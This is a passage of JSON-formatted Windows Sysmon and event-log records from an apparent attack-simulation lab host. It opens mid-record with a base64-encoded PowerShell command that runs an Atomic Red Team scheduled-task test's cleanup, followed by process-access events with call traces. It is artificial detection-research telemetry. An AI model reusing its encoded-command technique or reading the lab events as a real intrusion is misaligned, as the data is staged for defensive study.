WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-00107B610800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-00107B610800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.558","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.558\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 